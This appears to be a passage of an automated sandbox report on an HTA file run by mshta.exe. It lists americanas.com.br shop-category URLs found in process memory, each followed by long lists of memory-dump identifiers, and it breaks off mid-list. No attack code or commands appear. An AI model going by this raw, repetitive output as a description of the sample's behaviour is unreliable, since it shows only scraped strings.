https://www.americanas.com.br/categoria/moda?chave=pfm_home_moda_menu
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488139096.000000000AC17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/colchao?chave=pfm_hm_tt_1_0_colchao
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/escritorio/cadeiras-para-escritorio
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/escritorio/mesas-para-escritorio
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488139096.000000000AC17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378079621.000000000AB9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487748345.000000000ABA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/poltrona?chave=pfm_hm_tt_1_0_poltrona
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/quarto-completo?chave=pfm_hm_tt_1_0_quarto-completoa
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-estar/cadeira?chave=pfm_hm_tt_1_0_cadeira-aqQ
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-jantar?chave=pfm_hm_tt_1_0_sala-de-jantari
Source: mshta.exe, 00000000.00000003.25435794233.0000000009C5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488139096.000000000AC17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398339352.0000000009C5B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401639777.000000000AC39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422811267.0000000009C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sofa?chave=pfm_hm_tt_1_0_sofa
Source: mshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479387385.0000000003003000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398326236.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478014141.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveis
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=pfm_home_moveis_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410331977.000000000ABF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=pfm_home_papelaria_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429809618.0000000009C48000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435929209.0000000009C4A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429545584.0000000009C47000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/pc-gamer?chave=pfm_home_pcgamer_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/pet-shop?chave=pfm_home_petshop_menu
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429764625.0000000009C1E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437805828.0000000009C1F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/relogios-e-joias/relogios?chave=pfm_home_relogios_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/saude-e-bem-estar?chave=pfm_home_saude_menu
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/saude-e-bem-estar?chave=pfm_home_saude_menu(
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/sinalizacao-e-seguranca?chave=pfm_home_sinalizacao_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 